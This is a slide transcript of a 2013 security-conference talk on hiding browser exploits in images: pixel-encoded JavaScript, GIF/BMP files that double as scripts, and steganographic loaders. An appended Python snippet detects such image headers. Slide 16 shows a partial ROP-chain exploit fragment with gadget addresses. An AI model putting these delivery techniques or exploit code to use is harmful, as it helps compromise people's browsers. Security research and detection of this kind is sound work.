Deadly pixels - NSC 2013

My presentation at NoSuchCon 2013, Paris. What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects.

Download PDF - http://www.nosuchcon.com/talks/D1_05_Saumil_Deadly_Pixels.pdf

Published in: Technology, Art & Photos

  1. net-square / Deadly Pixels / Saumil Shah, NoSuchCon 2013
  2. Saumil Shah, presented by / Deadly Pixels / One day, / A mad meta-poet, / With nothing to say, / Wrote a mad meta-poem / That started "One day, / A mad meta-poet / With nothing to say...
  3. #who am i / CEO Net-Square / Reverse Engineering / Exploit Writing / Penetration Testing / Offensive Security / Attack Defense / Conference Speaker / Conference Trainer / Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi ....... <insert buzzwordy appsec jargon here>
  4. You either have an 0-day...
  5. ...OR IT'S HOW YOU USE IT
  6. A successful exploit... / ...is one that is delivered properly.
  7. Stealth Techniques Today / JS Obfuscation / Broken File Formats / OLE Embedding / Javascript/Actionscript / Spreading the payload
  8. Exploit Success Factors / Is it fresh? / Is there a patch? / Can it be detected?
  9. Putting together what I know / Web Hacking / Binary Exploits
  10. SNEAKY / LETHAL
  11. Hiding In Plain Sight
  12. [no slide text]
  13. [no slide text]
  14. Exploits as Grayscale Images
      •  Grayscale encoding (0-255).
      •  1 pixel = 1 character.
      •  Perfectly valid image.
      G r e e t i n g s   P r o f e s s o r   F a l k e n
  15. I'm an evil Javascript / I'm an innocent image
  16. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))} var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597; function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="" ! <CANVAS>
  17. See no eval()
  18. Same Same No Different! / var a = eval(str); / a = (new Function(str))();
  19. IMAJS / I iz a Javascript
  20. IMAJS: Javascript, as an Image!
  21. IMAJS-GIF Browser Support

      Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
      2f 2a   00 00  Firefox           yes             yes
      2f 2a   00 00  Safari            yes             yes
      2f 2a   00 00  IE                no              yes
      2f 2a   00 00  Chrome            yes             yes
      2f 2a   00 00  Opera             ?               ?
      2f 2a   00 00  Preview.app       yes             -
      2f 2a   00 00  XP Image Viewer   no              -
      2f 2a   00 00  Win 7 Preview     yes             -

  22. IMAJS-BMP Browser Support

      Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
      2f 2a   00 00  Firefox           yes             yes
      2f 2a   00 00  Safari            yes             yes
      2f 2a   00 00  IE                yes             yes
      2f 2a   00 00  Chrome            yes             yes
      2f 2a   00 00  Opera             yes             yes
      2f 2a   00 00  Preview.app       yes             -
      2f 2a   00 00  XP Image Viewer   yes             -
      2f 2a   00 00  Win 7 Preview     yes             -

  23. Stegosploit!
  24. Demo / IMAJS stego FTW!
  25. IMAJS "loader" script / Alpha encoded exploit code
  26. The Near Future / HTML5 / CANVAS / Heap Spray / WebGL / Cyber Cloud BYOD
  27. sort of close". / @therealsaumil / saumil@net-square.com / sort of close". / Were the words that the mad poet / Finally chose, / To bring his mad poem / To some
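
An added example, not part of the original slides: a Python check for the header pattern in the IMAJS-GIF and IMAJS-BMP tables (slides 21 and 22), where the four bytes `2f 2a 00 00` begin with ASCII `/*`. The field offsets come from the GIF and BMP file formats, and the function name and sample byte strings are constructed for illustration; none of these are taken from the slides.

```python
# Added example, not from the slides: flag GIF/BMP bytes whose header
# carries the 2f 2a 00 00 pattern listed in the IMAJS tables.
import struct

SLASH_STAR = bytes.fromhex("2f2a")  # ASCII "/*", opens a JavaScript comment
STAR_SLASH = b"*/"                  # closes it again later in the file

# format -> (magic signatures, offset of the first field after the magic).
# Offsets are from the GIF and BMP file formats (assumption, not the slides).
FORMATS = {
    "gif": ((b"GIF87a", b"GIF89a"), 6),
    "bmp": ((b"BM",), 2),
}

def inspect_image(data: bytes) -> dict:
    """Report whether an image header doubles as the start of a JS comment."""
    for name, (magics, offset) in FORMATS.items():
        if not data.startswith(magics):
            continue
        field = data[offset:offset + 4]
        opens = field[:2] == SLASH_STAR
        finding = {
            "format": name,
            "header_field": field.hex(" "),
            "opens_js_comment": opens,
            "closes_js_comment": opens and STAR_SLASH in data[offset + 2:],
        }
        if name == "bmp" and len(field) == 4:
            # In BMP this field is the declared file size. A legitimate file of
            # exactly 0x2a2f (10799) bytes also starts this way, so compare it
            # with the real length before treating the match as a finding.
            finding["size_matches"] = struct.unpack("<I", field)[0] == len(data)
        return finding
    return {"format": None, "header_field": "", "opens_js_comment": False,
            "closes_js_comment": False}

# Constructed samples: header bytes only, not complete images.
BENIGN_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00" * 3
FLAGGED_GIF = b"GIF89a" + bytes.fromhex("2f2a0000") + b"\x00" * 8 + STAR_SLASH
FLAGGED_BMP = b"BM" + bytes.fromhex("2f2a0000") + b"\x00" * 8
HONEST_BMP = b"BM" + struct.pack("<I", 0x2A2F) + b"\x00" * (0x2A2F - 6)

if __name__ == "__main__":
    for label, blob in [("benign gif", BENIGN_GIF), ("flagged gif", FLAGGED_GIF),
                        ("flagged bmp", FLAGGED_BMP), ("honest bmp", HONEST_BMP)]:
        print(label, inspect_image(blob))
```

An upload filter or proxy rule can use `opens_js_comment` as the primary signal and `size_matches` to triage BMP hits, since re-encoding a flagged image rewrites the header fields.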
